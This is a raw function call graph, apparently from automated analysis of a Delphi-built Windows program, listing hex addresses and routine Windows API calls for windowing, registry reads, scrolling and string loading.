46ac28 51076->51081 51180 46915c 12 API calls 51077->51180 51082 403400 4 API calls 51078->51082 51084 46a871 51079->51084 51085 414ae8 4 API calls 51080->51085 51179 46915c 12 API calls 51081->51179 51087 46a8a2 51082->51087 51088 414ae8 4 API calls 51084->51088 51089 46a7e7 51085->51089 51110 46a988 51087->51110 51159 469868 51087->51159 51092 46a892 51088->51092 51153 403634 51089->51153 51090 46ac36 51091 403400 4 API calls 51090->51091 51095 46ac7c 51091->51095 51097 403634 4 API calls 51092->51097 51102 403400 4 API calls 51095->51102 51096 46aa10 51100 403400 4 API calls 51096->51100 51097->51087 51104 46aa0e 51100->51104 51101 46a8c4 51105 46a902 51101->51105 51106 46a8ca 51101->51106 51107 46ac84 51102->51107 51174 469ca4 43 API calls 51104->51174 51111 403400 4 API calls 51105->51111 51108 403494 4 API calls 51106->51108 51109 403420 4 API calls 51107->51109 51113 46a8d8 51108->51113 51114 46ac91 51109->51114 51110->51096 51115 46a9cf 51110->51115 51116 46a900 51111->51116 51165 47c26c 51113->51165 51114->50533 51120 403494 4 API calls 51115->51120 51168 469b5c 51116->51168 51124 46a9dd 51120->51124 51122 46aa39 51131 46aa44 51122->51131 51132 46aa9a 51122->51132 51123 46a8f0 51126 403634 4 API calls 51123->51126 51127 414ae8 4 API calls 51124->51127 51126->51116 51128 46a9fe 51127->51128 51130 403634 4 API calls 51128->51130 51129 46a929 51135 46a934 51129->51135 51136 46a98a 51129->51136 51130->51104 51134 403494 4 API calls 51131->51134 51133 403400 4 API calls 51132->51133 51141 46aaa2 51133->51141 51137 46aa52 51134->51137 51139 403494 4 API calls 51135->51139 51138 403400 4 API calls 51136->51138 51137->51141 51145 403634 4 API calls 51137->51145 51146 46aa98 51137->51146 51138->51110 51140 46a942 51139->51140 51140->51110 51147 403634 4 API calls 51140->51147 51151 46ab4b 51141->51151 51175 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51141->51175 51143 46aac5 51143->51151 51176 494f3c 18 API calls 51143->51176 51145->51137 51146->51141 51147->51140 51149 46abec 51178 429144 SendMessageA SendMessageA 51149->51178 51177 4290f4 SendMessageA 51151->51177 51152->50535 51154 40363c 51153->51154 51155 4034bc 4 API calls 51154->51155 51156 40364f 51155->51156 51157 403450 4 API calls 51156->51157 51158 403677 51157->51158 51181 42a040 SendMessageA 51159->51181 51161 469877 51162 469897 51161->51162 51182 42a040 SendMessageA 51161->51182 51162->51101 51164 469887 51164->51101 51183 47c2b4 51165->51183 51172 469b89 51168->51172 51169 469beb 51170 403400 4 API calls 51169->51170 51171 469c00 51170->51171 51171->51129 51172->51169 51528 469ae0 43 API calls 51172->51528 51174->51122 51175->51143 51176->51151 51177->51149 51178->51068 51179->51090 51180->51090 51181->51161 51182->51164 51184 403494 4 API calls 51183->51184 51191 47c2e7 51184->51191 51185 47c3f9 51186 403420 4 API calls 51185->51186 51187 47c289 51186->51187 51187->51123 51189 403778 4 API calls 51189->51191 51191->51185 51191->51189 51194 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51191->51194 51195 47b100 51191->51195 51439 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51191->51439 51440 403800 51191->51440 51444 42c97c CharPrevA 51191->51444 51194->51191 51196 47b152 51195->51196 51197 47b130 51195->51197 51198 47b172 51196->51198 51199 47b160 51196->51199 51197->51196 51449 47a030 19 API calls 51197->51449 51202 47b1d5 51198->51202 51203 47b180 51198->51203 51200 403494 4 API calls 51199->51200 51267 47b16d 51200->51267 51215 47b1f6 51202->51215 51216 47b1e3 51202->51216 51205 47b1af 51203->51205 51206 47b189 51203->51206 51204 403400 4 API calls 51208 47baf8 51204->51208 51207 47b1c2 51205->51207 51451 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51205->51451 51209 47b19c 51206->51209 51450 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51206->51450 51213 403494 4 API calls 51207->51213 51214 403400 4 API calls 51208->51214 51211 403494 4 API calls 51209->51211 51211->51267 51213->51267 51217 47bb00 51214->51217 51219 47b217 51215->51219 51220 47b204 51215->51220 51218 403494 4 API calls 51216->51218 51217->51191 51218->51267 51222 47b267 51219->51222 51223 47b225 51219->51223 51221 403494 4 API calls 51220->51221 51221->51267 51229 47b275 51222->51229 51230 47b288 51222->51230 51224 47b241 51223->51224 51225 47b22e 51223->51225 51227 47b254 51224->51227 51452 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51224->51452 51226 403494 4 API calls 51225->51226 51226->51267 51228 403494 4 API calls 51227->51228 51228->51267 51232 403494 4 API calls 51229->51232 51233 47b296 51230->51233 51234 47b2a9 51230->51234 51232->51267 51235 403494 4 API calls 51233->51235 51236 47b2b7 51234->51236 51237 47b2ca 51234->51237 51235->51267 51238 403494 4 API calls 51236->51238 51239 47b2eb 51237->51239 51240 47b2d8 51237->51240 51238->51267 51242 47b327 51239->51242 51243 47b2f9 51239->51243 51241 403494 4 API calls 51240->51241 51241->51267 51248 47b335 51242->51248 51249 47b364 51242->51249 51244 47b315 51243->51244 51245 47b302 51243->51245 51247 47c26c 43 API calls 51244->51247 51246 403494 4 API calls 51245->51246 51246->51267 51247->51267 51250 47b351 51248->51250 51251 47b33e 51248->51251 51254 47b372 51249->51254 51255 47b3a0 51249->51255 51253 403494 4 API calls 51250->51253 51252 403494 4 API calls 51251->51252 51252->51267 51253->51267 51256 47b38e 51254->51256 51257 47b37b 51254->51257 51260 47b3ae 51255->51260 51261 47b3dd 51255->51261 51267->51204 51439->51191 51441 403804 51440->51441 51443 40382f 51440->51443 51442 4038a4 4 API calls 51441->51442 51442->51443 51443->51191 51444->51191 51449->51197 51450->51209 51451->51207 51452->51227 51528->51172 51530 47dd19 51529->51530 51533 47dd56 51529->51533 51561 455d0c 51530->51561 51533->50541 51535 47dd6d 51535->50541 51680 466714 51536->51680 51539->50551 51541 42f56c 51540->51541 51542 42f58f GetActiveWindow GetFocus 51541->51542 51543 41eea4 2 API calls 51542->51543 51544 42f5a6 51543->51544 51545 42f5c3 51544->51545 51546 42f5b3 RegisterClassA 51544->51546 51547 42f652 SetFocus 51545->51547 51548 42f5d1 CreateWindowExA 51545->51548 51546->51545 51550 403400 4 API calls 51547->51550 51548->51547 51549 42f604 51548->51549 51711 42427c 51549->51711 51552 42f66e 51550->51552 51556 494f3c 18 API calls 51552->51556 51553 42f62c 51554 42f634 CreateWindowExA 51553->51554 51554->51547 51555 42f64a ShowWindow 51554->51555 51555->51547 51556->50588 51717 44b514 51557->51717 51562 455d1d 51561->51562 51563 455d21 51562->51563 51564 455d2a 51562->51564 51587 455a10 51563->51587 51595 455af0 29 API calls 51564->51595 51567 455d27 51567->51533 51568 47d970 51567->51568 51573 47da6c 51568->51573 51579 47d9b0 51568->51579 51569 403420 4 API calls 51570 47db4f 51569->51570 51570->51535 51577 47dabd 51573->51577 51583 47da0f 51573->51583 51650 479630 51573->51650 51575 47c26c 43 API calls 51575->51577 51576 47c26c 43 API calls 51576->51579 51577->51573 51577->51575 51580 454100 20 API calls 51577->51580 51581 47da59 51577->51581 51578 47c26c 43 API calls 51585 47da18 51578->51585 51579->51573 51579->51576 51579->51583 51579->51585 51624 479770 51579->51624 51635 4798d4 51579->51635 51580->51577 51581->51583 51583->51569 51585->51578 51585->51579 51585->51581 51639 42c92c 51585->51639 51644 42c954 51585->51644 51649 47d67c 52 API calls 51585->51649 51596 42de1c 51587->51596 51589 455a2d 51590 455a7b 51589->51590 51599 455944 51589->51599 51590->51567 51593 455944 6 API calls 51594 455a5c RegCloseKey 51593->51594 51594->51567 51595->51567 51597 42de27 51596->51597 51598 42de2d RegOpenKeyExA 51596->51598 51597->51598 51598->51589 51604 42dd58 51599->51604 51601 403420 4 API calls 51602 4559f6 51601->51602 51602->51593 51603 45596c 51603->51601 51607 42dc00 51604->51607 51608 42dc26 RegQueryValueExA 51607->51608 51609 42dc6b 51608->51609 51614 42dc49 51608->51614 51610 403400 4 API calls 51609->51610 51612 42dd37 51610->51612 51611 42dc63 51613 403400 4 API calls 51611->51613 51612->51603 51613->51609 51614->51609 51614->51611 51615 4034e0 4 API calls 51614->51615 51616 403744 4 API calls 51614->51616 51615->51614 51617 42dca0 RegQueryValueExA 51616->51617 51617->51608 51618 42dcbc 51617->51618 51618->51609 51619 4038a4 4 API calls 51618->51619 51620 42dcfe 51619->51620 51621 42dd10 51620->51621 51623 403744 4 API calls 51620->51623 51622 403450 4 API calls 51621->51622 51622->51609 51623->51621 51625 479786 51624->51625 51626 479782 51624->51626 51627 403450 4 API calls 51625->51627 51626->51579 51628 479793 51627->51628 51629 4797b3 51628->51629 51630 479799 51628->51630 51632 479630 19 API calls 51629->51632 51631 479630 19 API calls 51630->51631 51633 4797af 51631->51633 51632->51633 51634 403400 4 API calls 51633->51634 51634->51626 51636 4798e0 51635->51636 51637 4798fb 51636->51637 51662 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51636->51662 51637->51579 51663 42c79c 51639->51663 51642 403778 4 API calls 51643 42c94e 51642->51643 51643->51585 51645 42c79c IsDBCSLeadByte 51644->51645 51646 42c964 51645->51646 51647 403778 4 API calls 51646->51647 51648 42c975 51647->51648 51648->51585 51649->51585 51651 47964b 51650->51651 51652 47970a 51651->51652 51655 47967c 51651->51655 51675 4794e4 19 API calls 51651->51675 51652->51573 51654 4796a1 51658 4796c2 51654->51658 51677 4794e4 19 API calls 51654->51677 51655->51654 51676 4794e4 19 API calls 51655->51676 51658->51652 51659 479702 51658->51659 51678 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51658->51678 51669 479368 51659->51669 51662->51637 51664 42c67c IsDBCSLeadByte 51663->51664 51665 42c7b1 51664->51665 51666 42c7fb 51665->51666 51668 42c444 IsDBCSLeadByte 51665->51668 51666->51642 51668->51665 51670 4793a3 51669->51670 51671 403450 4 API calls 51670->51671 51672 4793c8 51671->51672 51679 477a58 19 API calls 51672->51679 51674 479409 51674->51652 51675->51655 51676->51654 51677->51658 51678->51659 51679->51674 51681 403494 4 API calls 51680->51681 51682 466742 51681->51682 51697 42dbc8 51682->51697 51685 42dbc8 5 API calls 51686 466766 51685->51686 51687 466600 19 API calls 51686->51687 51688 466770 51687->51688 51689 42dbc8 5 API calls 51688->51689 51690 46677f 51689->51690 51700 466678 51690->51700 51693 42dbc8 5 API calls 51694 466798 51693->51694 51695 403400 4 API calls 51694->51695 51696 4667ad 51695->51696 51696->50545 51704 42db10 51697->51704 51701 466698 51700->51701 51702 4078f4 19 API calls 51701->51702 51703 4666e2 51702->51703 51703->51693 51705 42db30 51704->51705 51706 42dbbb 51704->51706 51705->51706 51707 4037b8 4 API calls 51705->51707 51709 403800 4 API calls 51705->51709 51710 42c444 IsDBCSLeadByte 51705->51710 51706->51685 51707->51705 51709->51705 51710->51705 51712 4242ae 51711->51712 51713 42428e GetWindowTextA 51711->51713 51715 403494 4 API calls 51712->51715 51714 4034e0 4 API calls 51713->51714 51716 4242ac 51714->51716 51715->51716 51716->51553 51720 44b38c 51717->51720 51721 44b3bf 51720->51721 51722 414ae8 4 API calls 51721->51722 51723 44b3d2 51722->51723 51724 44b3ff GetDC 51723->51724 51725 40357c 4 API calls 51723->51725 51731 41a1e8 51724->51731 51725->51724 51728 44b430 51739 44b0c0 51728->51739 51732 41a213 51731->51732 51733 41a2af 51731->51733 51750 403520 51732->51750 51734 403400 4 API calls 51733->51734 51735 41a2c7 SelectObject 51734->51735 51735->51728 51737 41a26b 51751 4034e0 4 API calls 51750->51751 51752 40352a 51751->51752 51752->51737 51755 4652d7 51753->51755 51754 4653b2 51764 46708c 51754->51764 51755->51754 51758 465327 51755->51758 51776 421a1c 51755->51776 51759 465361 51758->51759 51760 46536c 51758->51760 51763 46536a 51758->51763 51761 421a1c 7 API calls 51759->51761 51762 421a1c 7 API calls 51760->51762 51761->51763 51762->51763 51763->51754 51782 4185b8 7 API calls 51763->51782 51765 4670bc 51764->51765 51766 46709d 51764->51766 51765->50606 51767 414b18 4 API calls 51766->51767 51768 4670ab 51767->51768 51769 414b18 4 API calls 51768->51769 51769->51765 51780 421a74 51776->51780 51781 421a2a 51776->51781 51777 421a59 51777->51780 51791 421d28 SetFocus GetFocus 51777->51791 51780->51758 51781->51777 51783 408cbc 51781->51783 51782->51754 51784 408cc8 51783->51784 51792 406dec LoadStringA 51784->51792 51787 403450 4 API calls 51788 408cf9 51787->51788 51789 403400 4 API calls 51788->51789 51790 408d0e 51789->51790 51790->51777 51791->51780 51793 4034e0 4 API calls 51792->51793 51794 406e19 51793->51794 51794->51787 51843 46c7a5 51842->51843 51844 46c7f2 51843->51844 51845 414ae8 4 API calls 51843->51845 51847 403420 4 API calls 51844->51847 51846 46c7bb 51845->51846 52049 466924 6 API calls 51846->52049 51849 46c89c 51847->51849 51849->50686 52041 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51849->52041 51850 46c7c3 51851 414b18 4 API calls 51850->51851 51852 46c7d1 51851->51852 51853 46c7de 51852->51853 51855 46c7f7 51852->51855 52050 47efd0 42 API calls 51853->52050 51856 46c80f 51855->51856 51857 466a08 CharNextA 51855->51857 52051 47efd0 42 API calls 51856->52051 51859 46c80b 51857->51859 51859->51856 51860 46c825 51859->51860 51861 46c841 51860->51861 51862 46c82b 51860->51862 51863 42c99c CharNextA 51861->51863 52052 47efd0 42 API calls 51862->52052 51865 46c84e 51863->51865 51865->51844 52053 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51865->52053 51867 46c865 51868 451458 4 API calls 51867->51868 51869 46c872 51868->51869 52054 47efd0 42 API calls 51869->52054 51872 4241ed SetActiveWindow 51871->51872 51876 424223 51871->51876 52055 42364c 51872->52055 51876->50698 51876->50699 51877 42420a 51877->51876 51878 42421d SetFocus 51877->51878 51878->51876 51880 482505 51879->51880 51881 4824d7 51879->51881 51883 475bd0 51880->51883 52068 494cec 18 API calls 51881->52068 52069 457d10 51883->52069 52042->50694 52049->51850 52050->51844 52051->51844 52052->51844 52053->51867 52054->51844 52064 4235f8 SystemParametersInfoA 52055->52064 52058 423665 ShowWindow 52060 423670 52058->52060 52061 423677 52058->52061 52067 423628 SystemParametersInfoA 52060->52067 52063 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52061->52063 52063->51877 52065 423616 52064->52065 52065->52058 52066 423628 SystemParametersInfoA 52065->52066 52066->52058 52067->52061 52068->51880 52070 457d3c 52069->52070 52085 457e44 52069->52085 52541 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52070->52541 52071 457e95 52074 403400 4 API calls 52071->52074 52076 457eaa 52074->52076 52075 457d44 52077 4078f4 19 API calls 52075->52077 52090 4072a8 52076->52090 52078 457db5 52077->52078 52542 457d00 20 API calls 52078->52542 52084 457dbd 52085->52071 52545 45757c 6 API calls 52085->52545 52091 403738 52090->52091 52092 4072b2 SetCurrentDirectoryA 52091->52092 52541->52075 52542->52084 52545->52071 53742 431eec 53703->53742 53705 403400 4 API calls 53706 43da76 53705->53706 53706->50755 53706->50756 53707 43d9f2 53707->53705 53709 431bd6 53708->53709 53710 402648 4 API calls 53709->53710 53711 431c06 53710->53711 53712 4947f8 53711->53712 53713 4948cd 53712->53713 53717 494812 53712->53717 53719 494910 53713->53719 53715 433d6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53715->53717 53717->53713 53717->53715 53718 403450 4 API calls 53717->53718 53747 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53717->53747 53748 431ca0 53717->53748 53718->53717 53720 49492c 53719->53720 53756 433d6c 53720->53756 53722 494931 53723 431ca0 4 API calls 53722->53723 53724 49493c 53723->53724 53725 43d594 53724->53725 53726 43d5c1 53725->53726 53731 43d5b3 53725->53731 53726->50766 53727 43d63d 53733 43d6f7 53727->53733 53759 447084 53727->53759 53729 43d688 53765 43dd50 53729->53765 53731->53726 53731->53727 53732 447084 4 API calls 53731->53732 53732->53731 53734 43d8fd 53733->53734 53736 43d8de 53733->53736 53783 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53733->53783 53734->53726 53785 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53734->53785 53784 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53736->53784 53739->50768 53740->50770 53741->50757 53743 403494 4 API calls 53742->53743 53746 431efb 53743->53746 53744 431f25 53744->53707 53745 403744 4 API calls 53745->53746 53746->53744 53746->53745 53747->53717 53749 431cae 53748->53749 53752 431cc0 53748->53752 53754 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53749->53754 53751 431ce2 53751->53717 53752->53751 53755 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53755 53754->53752 53755->53751 53757 402648 4 API calls 53756->53757 53758 433d7b 53757->53758 53758->53722 53760 4470a3 53759->53760 53761 4470aa 53759->53761 53786 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53760->53786 53763 431ca0 4 API calls 53761->53763 53764 4470ba 53763->53764 53764->53729 53766 43dd6c 53765->53766 53772 43dd99 53765->53772 53767 402660 4 API calls 53766->53767 53766->53772 53767->53766 53768 43ddce 53768->53733 53770 43fea5 53770->53768 53796 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53770->53796 53771 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53771->53772 53772->53768 53772->53770 53772->53771 53774 43c938 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53774 53778 433d18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53778 53779 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53779 53780 436650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53780 53781 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53781 53782 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53782 53787 4396e0 53772->53787 53793 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53793 53794 43dc48 18 API calls 53772->53794 53795 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53795 53774->53772 53778->53772 53779->53772 53780->53772 53781->53772 53782->53772 53783->53733 53784->53734 53785->53734 53786->53761 53788 4396e9 53787->53788 53793->53772 53794->53772 53795->53772 53796->53770 53799 41fb58 53800 41fb61 53799->53800 53803 41fdfc 53800->53803 53802 41fb6e 53804 41feee 53803->53804 53805 41fe13 53803->53805 53804->53802 53805->53804 53824 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53805->53824 53807 41fe49 53808 41fe73 53807->53808 53809 41fe4d 53807->53809 53834 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53808->53834 53825 41fb9c 53809->53825 53813 41fe81 53814 41fe85 53813->53814 53815 41feab 53813->53815 53817 41fb9c 10 API calls 53814->53817 53818 41fb9c 10 API calls 53815->53818 53816 41fb9c 10 API calls 53819 41fe71 53816->53819 53820 41fe97 53817->53820 53821 41febd 53818->53821 53819->53802 53822 41fb9c 10 API calls 53820->53822 53823 41fb9c 10 API calls 53821->53823 53822->53819 53823->53819 53824->53807 53826 41fbb7 53825->53826 53827 41f93c 4 API calls 53826->53827 53828 41fbcd 53826->53828 53827->53828 53835 41f93c 53828->53835 53830 41fc15 53831 41fc38 SetScrollInfo 53830->53831 53843 41fa9c 53831->53843 53834->53813 53836 4181e0 53835->53836 53837 41f959 GetWindowLongA 53836->53837 53838 41f996 53837->53838 53839 41f976 53837->53839 53855 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53838->53855 53854 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53839->53854 53842 41f982 53842->53830 53844 41faaa 53843->53844 53845 41fab2 53843->53845 53844->53816 53846 41faf1 53845->53846 53847 41fae1 53845->53847 53851 41faef 53845->53851 53857 417e48 IsWindowVisible ScrollWindow SetWindowPos 53846->53857 53856 417e48 IsWindowVisible ScrollWindow SetWindowPos 53847->53856 53848 41fb31 GetScrollPos 53848->53844 53852 41fb3c 53848->53852 53851->53848 53853 41fb4b SetScrollPos 53852->53853 53853->53844 53854->53842 53855->53842 53856->53851 53857->53851 53858 420598 53859 4205ab 53858->53859 53879 415b30 53859->53879 53861 4206f2 53862 420709 53861->53862 53886 4146d4 KiUserCallbackDispatcher 53861->53886 53866 420720 53862->53866 53887 414718 KiUserCallbackDispatcher 53862->53887 53863 420651 53884 420848 20 API calls 53863->53884 53864 4205e6 53864->53861 53864->53863 53872 420642 MulDiv 53864->53872 53869 420742 53866->53869 53888 420060 12 API calls 53866->53888 53870 42066a 53870->53861 53885 420060 12 API calls 53870->53885 53883 41a304 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53872->53883 53875 420687 53876 4206a3 MulDiv 53875->53876 53877 4206c6 53875->53877 53876->53877 53877->53861 53878 4206cf MulDiv 53877->53878 53878->53861 53880 415b42 53879->53880 53889 414470 53880->53889 53882 415b5a 53882->53864 53883->53863 53884->53870 53885->53875 53886->53862 53887->53866 53888->53869 53890 41448a 53889->53890 53893 410458 53890->53893 53892 4144a0 53892->53882 53896 40dca4 53893->53896 53895 41045e 53895->53892 53897 40dd06 53896->53897 53898 40dcb7 53896->53898 53903 40dd14 53897->53903 53901 40dd14 19 API calls 53898->53901 53902 40dce1 53901->53902 53902->53895 53904 40dd24 53903->53904 53906 40dd3a 53904->53906 53915 40e09c 53904->53915 53931 40d5e0 53904->53931 53934 40df4c 53906->53934 53909 40d5e0 5 API calls 53910 40dd42 53909->53910 53910->53909 53911 40ddae 53910->53911 53937 40db60 53910->53937 53913 40df4c 5 API calls 53911->53913 53914 40dd10 53913->53914 53914->53895 53951 40e96c 53915->53951 53917 403778 4 API calls 53919 40e0d7 53917->53919 53918 40e18d 53920 40e1b7 53918->53920 53921 40e1a8 53918->53921 53919->53917 53919->53918 54014 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53919->54014 54015 40e080 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53919->54015 54011 40ba24 53920->54011 53960 40e3c0 53921->53960 53927 40e1b5 53928 403400 4 API calls 53927->53928 53929 40e25c 53928->53929 53929->53904 53932 40ea08 5 API calls 53931->53932 53933 40d5ea 53932->53933 53933->53904 54048 40d4bc 53934->54048 54057 40df54 53937->54057 53940 40e96c 5 API calls 53941 40db9e 53940->53941 53942 40e96c 5 API calls 53941->53942 53943 40dba9 53942->53943 53944 40dbc4 53943->53944 53945 40dbbb 53943->53945 53950 40dbc1 53943->53950 54064 40d9d8 53944->54064 54067 40dac8 19 API calls 53945->54067 53948 403420 4 API calls 53949 40dc8f 53948->53949 53949->53910 53950->53948 54017 40d780 53951->54017 53954 4034e0 4 API calls 53955 40e98f 53954->53955 53956 403744 4 API calls 53955->53956 53957 40e996 53956->53957 53958 40d780 5 API calls 53957->53958 53959 40e9a4 53958->53959 53959->53919 53961 40e3ec 53960->53961 53963 40e3f6 53960->53963 54022 40d440 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53961->54022 53964 40e511 53963->53964 53965 40e495 53963->53965 53966 40e4f6 53963->53966 53967 40e576 53963->53967 53968 40e438 53963->53968 53969 40e4d9 53963->53969 53970 40e47a 53963->53970 53971 40e4bb 53963->53971 53982 40e45c 53963->53982 53974 40d764 5 API calls 53964->53974 54030 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53965->54030 54035 40e890 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53966->54035 53978 40d764 5 API calls 53967->53978 54023 40d764 53968->54023 54033 40e9a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53969->54033 54029 40d818 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53970->54029 54032 40dde4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53971->54032 53983 40e519 53974->53983 53977 403400 4 API calls 53984 40e5eb 53977->53984 53985 40e57e 53978->53985 53981 40e4a0 54031 40d470 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53981->54031 53982->53977 53991 40e523 53983->53991 53992 40e51d 53983->53992 53984->53927 53993 40e582 53985->53993 53994 40e59b 53985->53994 53986 40e4e4 54034 409d38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53986->54034 53988 40e461 54028 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53988->54028 53989 40e444 54026 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53989->54026 54036 40ea08 53991->54036 53999 40e521 53992->53999 54000 40e53c 53992->54000 54002 40ea08 5 API calls 53993->54002 54042 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53994->54042 54040 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53999->54040 54003 40ea08 5 API calls 54000->54003 54002->53982 54005 40e544 54003->54005 54004 40e44f 54027 40e26c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54004->54027 54039 40d8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54005->54039 54008 40e566 54041 40e2d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54008->54041 54043 40b9d0 54011->54043 54014->53919 54015->53919 54016 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54016->53927 54020 40d78b 54017->54020 54018 40d7c5 54018->53954 54020->54018 54021 40d7cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54020->54021 54021->54020 54022->53963 54024 40ea08 5 API calls 54023->54024 54025 40d76e 54024->54025 54025->53988 54025->53989 54026->54004 54027->53982 54028->53982 54029->53982 54030->53981 54031->53982 54032->53982 54033->53986 54034->53982 54035->53982 54037 40d780 5 API calls 54036->54037 54038 40ea15 54037->54038 54038->53982 54039->53982 54040->54008 54041->53982 54042->53982 54044 40b9e2 54043->54044 54046 40ba07 54043->54046 54044->54046 54047 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54044->54047 54046->53927 54046->54016 54047->54046 54049 40ea08 5 API calls 54048->54049 54050 40d4c9 54049->54050 54051 40d4dc 54050->54051 54055 40eb0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54050->54055 54051->53910 54053 40d4d7 54056 40d458 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54053->54056 54055->54053 54056->54051 54058 40d764 5 API calls 54057->54058 54059 40df6b 54058->54059 54060 40db93 54059->54060 54061 40ea08 5 API calls 54059->54061 54060->53940 54062 40df78 54061->54062 54062->54060 54068 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54062->54068 54069 40ab7c 19 API calls 54064->54069 54066 40da00 54066->53950 54067->53950 54068->54060 54069->54066 56274 41363c SetWindowLongA GetWindowLongA 56275 41367b GetWindowLongA 56274->56275 56277 413699 SetPropA SetPropA 56274->56277 56276 41368a SetWindowLongA 56275->56276 56275->56277 56276->56277 56281 41f39c 56277->56281 56286 415270 56281->56286 56293 423c0c 56281->56293 56387 423a84 56281->56387 56282 4136e9 56287 41527d 56286->56287 56288 4152e3 56287->56288 56289 4152d8 56287->56289 56292 4152e1 56287->56292 56394 424b8c 13 API calls 56288->56394 56289->56292 56395 41505c 46 API calls 56289->56395 56292->56282 56298 423c42 56293->56298 56296 423cec 56299 423cf3 56296->56299 56300 423d27 56296->56300 56297 423c8d 56301 423c93 56297->56301 56302 423d50 56297->56302 56313 423c63 56298->56313 56396 423b68 56298->56396 56303 423cf9 56299->56303 56338 423fb1 56299->56338 56306 423d32 56300->56306 56307 42409a IsIconic 56300->56307 56304 423cc5 56301->56304 56305 423c98 56301->56305 56308 423d62 56302->56308 56309 423d6b 56302->56309 56311 423f13 SendMessageA 56303->56311 56312 423d07 56303->56312 56304->56313 56336 423cde 56304->56336 56337 423e3f 56304->56337 56315 423df6 56305->56315 56316 423c9e 56305->56316 56317 4240d6 56306->56317 56318 423d3b 56306->56318 56307->56313 56314 4240ae GetFocus 56307->56314 56319 423d78 56308->56319 56320 423d69 56308->56320 56403 424194 11 API calls 56309->56403 56311->56313 56312->56313 56339 423cc0 56312->56339 56367 423f56 56312->56367 56313->56282 56314->56313 56324 4240bf 56314->56324 56408 423b84 NtdllDefWindowProc_A 56315->56408 56325 423ca7 56316->56325 56326 423e1e PostMessageA 56316->56326 56417 424850 WinHelpA PostMessageA 56317->56417 56322 4240ed 56318->56322 56318->56339 56323 4241dc 11 API calls 56319->56323 56404 423b84 NtdllDefWindowProc_A 56320->56404 56334 4240f6 56322->56334 56335 42410b 56322->56335 56323->56313 56416 41eff4 GetCurrentThreadId EnumThreadWindows 56324->56416 56331 423cb0 56325->56331 56332 423ea5 56325->56332 56409 423b84 NtdllDefWindowProc_A 56326->56409 56344 423cb9 56331->56344 56345 423dce IsIconic 56331->56345 56346 423eae 56332->56346 56347 423edf 56332->56347 56333 423e39 56333->56313 56348 4244d4 5 API calls 56334->56348 56418 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56335->56418 56336->56339 56340 423e0b 56336->56340 56400 423b84 NtdllDefWindowProc_A 56337->56400 56338->56313 56358 423fd7 IsWindowEnabled 56338->56358 56339->56313 56402 423b84 NtdllDefWindowProc_A 56339->56402 56353 424178 12 API calls 56340->56353 56343 4240c6 56343->56313 56355 4240ce SetFocus 56343->56355 56344->56339 56356 423d91 56344->56356 56349 423dea 56345->56349 56350 423dde 56345->56350 56411 423b14 LocalAlloc TlsSetValue TlsGetValue 